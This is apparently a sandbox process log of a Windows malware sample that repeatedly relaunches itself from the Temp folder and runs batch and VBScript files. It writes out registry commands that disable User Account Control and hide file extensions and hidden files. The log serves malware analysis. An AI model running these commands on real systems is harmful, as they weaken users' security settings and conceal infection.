C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dikAwwMo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lGgYoAow.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XwYskskI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GWIIEMcE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QQkMwAQU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OYsEUwkM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NGYkMAUE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JCMAUwEM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fSoMQQkY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HyQQUsko.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eQYscgsg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eeogkoMI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CEAIwgMk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dMcMIsUU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RokEwQYQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VAgQMkIs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KskosQgE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cKUkAcoY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oSoIgIYw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uKwMggEQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bYMcowMU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XkwMEYUg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
